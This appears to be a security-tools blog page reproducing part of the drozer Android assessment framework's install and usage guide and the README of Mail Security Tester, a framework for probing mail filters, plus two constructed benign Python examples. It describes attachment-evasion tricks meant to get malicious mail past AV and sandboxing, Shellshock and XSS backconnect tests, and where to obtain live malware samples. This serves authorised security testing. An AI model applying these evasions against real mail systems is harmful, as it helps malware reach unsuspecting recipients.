Installing .rpm (Redhat/Fedora/CentOS)

    sudo rpm -i drozer-2.x.x-1.noarch.rpm

Building for Windows

NOTE: Windows Defender and other antivirus software will flag drozer as malware (an exploitation tool without exploit code wouldn't be much fun!). In order to run drozer you would have to add an exception to Windows Defender and any antivirus software. Alternatively, we recommend running drozer in a Windows/Linux VM.

    git clone https://github.com/mwrlabs/drozer/
    cd drozer
    python.exe setup.py bdist_msi

Installing .msi (Windows)

Run dist/drozer-2.x.x.win-x.msi

Arch Linux

    yaourt -S drozer

Usage

Installing the Agent

drozer can be installed using Android Debug Bridge (adb). Download the latest drozer Agent here.

    $ adb install drozer-agent-2.x.x.apk

Starting a Session

You should now have the drozer Console installed on your PC, and the Agent running on your test device. Now, you need to connect the two and you're ready to start exploring. We will use the server embedded in the drozer Agent to do this.

If using the Android emulator, you need to set up a suitable port forward so that your PC can connect to a TCP socket opened by the Agent inside the emulator, or on the device. By default, drozer uses port 31415:

    $ adb forward tcp:31415 tcp:31415

Now, launch the Agent, select the "Embedded Server" option and tap "Enable" to start the server. You should see a notification that the server has started.

Then, on your PC, connect using the drozer Console:

    On Linux:   $ drozer console connect
    On Windows: > drozer.bat console connect

If using a real device, the IP address of the device on the network must be specified:

    On Linux:   $ drozer console connect --server 192.168.0.10
    On Windows: > drozer.bat console connect --server 192.168.0.10

You should be presented with a drozer command prompt:

    selecting f75640f67144d9a3 (unknown sdk 4.1.1)
    dz>

The prompt confirms the Android ID of the device you have connected to, along with the manufacturer, model and Android software version. You are now ready to start exploring the device.

Command Reference

    Command       Description
    run           Executes a drozer module.
    list          Show a list of all drozer modules that can be executed in the current session. This hides modules that you do not have suitable permissions to run.
    shell         Start an interactive Linux shell on the device, in the context of the Agent process.
    cd            Mounts a particular namespace as the root of the session, to avoid having to repeatedly type the full name of a module.
    clean         Remove temporary files stored by drozer on the Android device.
    contributors  Displays a list of people who have contributed to the drozer framework and modules in use on your system.
    echo          Print text to the console.
    exit          Terminate the drozer session.
    help          Display help about a particular command or module.
    load          Load a file containing drozer commands, and execute them in sequence.
    module        Find and install additional drozer modules from the Internet.
    permissions   Display a list of the permissions granted to the drozer Agent.
    set           Store a value in a variable that will be passed as an environment variable to any Linux shells spawned by drozer.
    unset         Remove a named variable that drozer passes to any Linux shells that it spawns.

Contacting the Project

drozer is open source software, made great by contributions from the community. For full source code, to report bugs, suggest features and contribute patches please see our GitHub project:
https://github.com/mwrlabs/drozer

Bug reports, feature requests, comments and questions can be submitted here.

For the latest drozer news, follow the project on Twitter: @mwrdrozer

Download Drozer

Link: http://feedproxy.google.com/~r/PentestTools/~3/gWlKeA3JnbA/drozer-v244-leading-security-assessment.html

Mail Security Tester – A Testing Framework For Mail Security And Filtering Solutions

A testing framework for mail security and filtering solutions.

IMPORTANT: Don't do anything evil with this! Tests of cloud or otherwise hosted solutions should always be approved by the tested provider. Only use your own test accounts and don't annoy anyone with a load of test mails.

Installation

The mail security testing framework works with Python >=3.5. Just pull this repository and go ahead. No further dependencies are required.

Usage

The script mail-tester.py runs the tests. Read the help message with ./mail-tester.py --help and check the list of test and evasion modules with ./mail-tester.py -l to get an overview of the capabilities and the usage of the script. Some hints:

- At least the parameters --smtp-server and --to should be given for a minimal test run.
- All parameters can also be stored in configuration files without the prefix --. These configuration files can be used by invoking ./mail-tester.py @tester.conf (configuration contained in tester.conf).
- Multiple recipients can be configured with --to for testing of different filter configurations.
- Some mail filtering solutions may reject messages after a while. Use --auto-delay for automatic throttling of the mails. This can be fine-tuned with --delay-step, --delay-max and --delay.
- Some tests (Spam and Malware) require samples. Put these in directories and configure these directories with the --spam-folder and --malware-folder parameters. The samples are not included in this repository (and will not be). Good places to get malware are theZoo, Das Malwerk or other collections. Spam can be exported straight from your Spam folder, but must be in EML format.
- Blacklists can be supplied with the --blacklist parameter and are used as sender addresses.
- The Shellshock and subject XSS test cases should have a valid backconnect domain, where you are able to see any backconnects (especially DNS requests). The free Canary Tokens service can be used for this purpose. Thanks to Thinkst for providing this awesome service!
- Some neat attachment recognition evasion tricks can be enabled with --evasion content-disposition. These were used in the past to confuse AV/sandboxing solutions and let them pass malicious mails.
- Don't forget to log the test results with --log. Mail filtering providers often reject mails in the SMTP dialog, which is reflected in the generated log.
- Test cases can be dumped with --output as plain files in a directory, in MBox (--mbox) or MailDir (--maildir) format. This is useful to test mail user agents without sending any mails, or to document or review generated test cases.

Development and Extension

Tests

Your own tests can be implemented with a class in one of the existing or newly created Python files in the tests/ directory. The class must be a subclass of MailTestBase located in the module tests.base of this project. Newly implemented tests are discovered automatically when the class variable active is set to True. Further (if you plan to contribute tests back to the main repository), the class variables identifier, name and description should be set appropriately.

The following base classes exist with methods or class variables intended for overriding:

MailTestBase: Test class for generic tests.
- generateTestCases(): Yields test messages. These should be generated with the MIME* classes from the Python email.mime.* packages or with the Message class from email.message to ensure valid mail messages.
- active: Boolean value, whether the test should be active.
- identifier: Short identifier of the test. This one is used to enable or disable tests in parameters.
- name: Short test title.
- description: Longer test description, should fit within approximately 100 characters.
- delivery_sender and delivery_recipient: Boolean values, False by default. Normally, the sender and recipients are set in the message and the Python SMTP module takes them over from there. Sometimes it is desirable to set them explicitly in the SMTP library, which can be configured by setting these values to True.
- finalizeMessage(msg): By default, the base test class sets the From and To headers accordingly. This behaviour can be overridden if required for the test case.

MailAttachmentTestBase: Test class for attachment test cases. This generates a complete valid mail with a Subject and a text part and attaches the test case to it. Derived from MailTestBase, therefore the methods/variables from it can be overridden here, too.
- generateAttachments(): Yields test cases as (description, attachment) tuples.
- subject: Sets the subject. The placeholder {} is replaced by the description yielded by generateAttachments().
- generateTestCases(): Is already overridden with an implementation of the message generation described above, but may be further adapted if required.

Setting the subjects of generated messages is highly recommended to be able to recognize the tests in the receiving inbox.

Evasions

Evasion classes implement techniques for evading recognition of particular mail properties by mail security solutions. Currently, an evasion technique that tries to hide attachments from such solutions by intentionally broken Content-Disposition headers is implemented.

Implementing new Evasions

Evasions are implemented by a factory class pattern. The DeliveryBase class instantiates a factory class derived from the BaseEvasionFactory class. The factory constructor receives a flag that indicates if the evasion is activated. The evasion factory instance is then passed to the test class and stored in its evasions attribute, which contains a dict with the evasion identifiers as keys. Inside the test, an evasion class (based on EvasionBase) is instantiated with getEvasionGenerator(). The constructor parameters are defined individually per evasion technique.

The following base classes are used to implement evasions:

BaseEvasionFactory: Evasion factories must be based on this class. Usually, only the following class variables should be set:
- active: Set to True if the evasion should be active.
- identifier: Short identifier of the evasion module used for enabling it in the test configuration.
- name: Short title of the evasion technique.
- description: Longer description of the evasion technique. Should fit in approximately 100 characters.
- generator_evasion: Evasion class that is instantiated if the evasion is enabled.
- generator_default: Evasion class that is instantiated if the evasion is disabled.

BaseEvasion: Implementations of evasions must be subclasses of this base class. The following methods must be overridden:
- __init__(): Should instantiate the class with the base message or attachment that should be manipulated with evasion techniques.
- generate(): Apply the evasion technique to the object passed to the constructor and yield it to the caller as a (description, object with evasion applied) tuple.

Generally, the evasion class should yield all evasion variants and pass the default as a dedicated test case, while the default evasion classes only pass the given object or create the required data structures, like headers.

Using Evasion Techniques in Test Cases

Evasion techniques are used in test cases where they are applicable. E.g. if an evasion technique manipulates the header of a mail or attachment, the following steps have to be implemented:

1. Generate the base object (mail or attachment) without consideration of the evasion.
2. Instantiate the appropriate evasion class by utilization of the evasion factory instance from self.evasions, e.g.:
       evasion_items = self.evasions["evasion_identifier"].getEvasionGenerator(message)
3. Iterate over the generator and yield the test cases:
       for evasion_item in evasion_items:
           yield evasion_item

Usage of the Content Disposition Evasion Technique

The content disposition evasion technique is already implemented in the framework and should be used for all test cases that target the recognition of malicious attachments.
The constructor receives an attachment and the intended file name. The evasion class then yields (evasion name, attachment with applied evasion technique) tuples that can directly be yielded by the tests generateAttachments() method.Download Mail-Security-Tester
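The test-class contract described under Tests, as an added example that is not the project's code: tests.base.MailTestBase is not importable outside the repository, so MiniTestBase below is a hypothetical stand-in that follows the documented interface (active, identifier, name, description, generateTestCases(), finalizeMessage(msg)). The constructed SubjectLengthTest yields messages built with the email.mime classes, and dump_to_mbox stores the finalized cases in an mbox file, the way --output with --mbox does, so nothing is sent anywhere.

```python
# Added example (not the project's code). MiniTestBase is a hypothetical
# stand-in for tests.base.MailTestBase with the documented class variables
# and methods; the real framework discovers its tests from tests/ itself.
import mailbox
import os
import tempfile
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText


class MiniTestBase:
    """Stand-in for MailTestBase (assumption, mirrors the documented contract)."""
    active = False
    identifier = ""
    name = ""
    description = ""
    delivery_sender = False      # envelope sender taken from the From header
    delivery_recipient = False   # envelope recipients taken from the To header

    def __init__(self, sender, recipient):
        self.sender = sender
        self.recipient = recipient

    def generateTestCases(self):
        """Yield email.message.Message objects; overridden by each test."""
        raise NotImplementedError

    def finalizeMessage(self, msg):
        """Documented default behaviour: set From and To before delivery."""
        msg["From"] = self.sender
        msg["To"] = self.recipient
        return msg


class SubjectLengthTest(MiniTestBase):
    """Constructed test: messages whose Subject header grows in length."""
    active = True
    identifier = "subject-length"
    name = "Subject length"
    description = "Messages with Subject headers of increasing length"

    def generateTestCases(self):
        for length in (10, 100, 1000):
            msg = MIMEMultipart()
            # A recognisable subject prefix makes the cases easy to find in the inbox.
            msg["Subject"] = "Subject length test " + "A" * length
            msg.attach(MIMEText("Test mail with a %d character subject" % length))
            yield msg


def dump_to_mbox(test, path):
    """Run one test class and store its finalized cases in an mbox file
    (the equivalent of --output with --mbox) instead of sending them."""
    box = mailbox.mbox(path)
    count = 0
    try:
        for msg in test.generateTestCases():
            box.add(test.finalizeMessage(msg))
            count += 1
        box.flush()
    finally:
        box.close()
    return count


def run_example():
    """Generate the cases into a temporary mbox, read them back and report
    (written count, [(From, To, subject has the expected prefix), ...])."""
    path = os.path.join(tempfile.mkdtemp(), "cases.mbox")
    test = SubjectLengthTest("tester@example.test", "inbox@example.test")
    written = dump_to_mbox(test, path)
    stored = [(m["From"], m["To"], m["Subject"].startswith("Subject length test"))
              for m in mailbox.mbox(path)]
    return written, stored


if __name__ == "__main__":
    print(run_example())
```

Reading the mbox back with a mail user agent is the offline review step the Usage section mentions; the same generator could be handed to a sender that honours delivery_sender and delivery_recipient when the envelope must differ from the headers.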
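The factory pattern from "Implement new Evasions" together with the three steps under "Using Evasion Techniques in Test Cases", as an added example that is not the project's code: BaseEvasion, BaseEvasionFactory and the evasions dict are hypothetical stand-ins that follow the documented interface, since the framework's own classes are not importable here. The variant this factory produces, the attachment filename carried as an RFC 2231 encoded parameter (filename*=), is a constructed, standards-compliant coverage check that a filter must still decode; it is not the framework's content-disposition technique. The default generator only creates the required header and passes the attachment through, and the enabled generator yields the default as its own test case first, as the documentation asks.

```python
# Added example (not the project's code). The base classes below are
# hypothetical stand-ins that follow the documented factory pattern.
import copy
from email.mime.application import MIMEApplication


class BaseEvasion:
    """Stand-in: subclasses override __init__() and generate()."""
    def __init__(self, obj):
        self.obj = obj

    def generate(self):
        """Yield (description, object with technique applied) tuples."""
        raise NotImplementedError


class PlainFilename(BaseEvasion):
    """generator_default: only creates the required header, no variation."""
    def __init__(self, attachment, filename):
        super().__init__(attachment)
        self.filename = filename

    def generate(self):
        att = copy.deepcopy(self.obj)
        att.add_header("Content-Disposition", "attachment", filename=self.filename)
        yield "plain filename", att


class Rfc2231Filename(PlainFilename):
    """generator_evasion: yields the default as a dedicated test case, then the
    variant whose filename is an RFC 2231 encoded parameter (filename*=...)."""
    def generate(self):
        yield from super().generate()
        att = copy.deepcopy(self.obj)
        # A (charset, language, value) tuple makes email emit filename*=utf-8''...
        att.add_header("Content-Disposition", "attachment",
                       filename=("utf-8", "", self.filename))
        yield "RFC 2231 encoded filename", att


class BaseEvasionFactory:
    """Stand-in factory: the enabled flag selects the generator class."""
    active = False
    identifier = ""
    name = ""
    description = ""
    generator_evasion = None
    generator_default = None

    def __init__(self, enabled):
        self.enabled = enabled

    def getEvasionGenerator(self, *args):
        cls = self.generator_evasion if self.enabled else self.generator_default
        return cls(*args).generate()


class FilenameEncodingFactory(BaseEvasionFactory):
    """Constructed factory for the filename encoding coverage check."""
    active = True
    identifier = "filename-encoding"
    name = "Filename encoding"
    description = "Attachment filename as RFC 2231 encoded parameter"
    generator_evasion = Rfc2231Filename
    generator_default = PlainFilename


class AttachmentTest:
    """Constructed test following the three documented steps."""
    def __init__(self, evasions):
        self.evasions = evasions   # dict: evasion identifier -> factory instance

    def generateAttachments(self):
        # 1. base attachment without regard to the evasion (constructed bytes)
        att = MIMEApplication(b"constructed harmless sample", "octet-stream")
        # 2. instantiate the evasion class through the factory instance
        items = self.evasions["filename-encoding"].getEvasionGenerator(att, "report.pdf")
        # 3. iterate over the generator and yield the (description, attachment) cases
        for item in items:
            yield item


def run_example(enabled):
    """Return (description, Content-Disposition header, decoded filename) per case."""
    test = AttachmentTest({"filename-encoding": FilenameEncodingFactory(enabled)})
    return [(desc, att["Content-Disposition"], att.get_filename())
            for desc, att in test.generateAttachments()]


if __name__ == "__main__":
    for row in run_example(True):
        print(row)
```

With the factory disabled only the plain case is produced, so a run with and without the evasion flag differs exactly by the encoded variant; att.get_filename() decodes both forms to the same name, which is the property a receiving filter has to reproduce.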

Link: http://feedproxy.google.com/~r/PentestTools/~3/HrZh9xBkVuo/mail-security-tester-testing-framework.html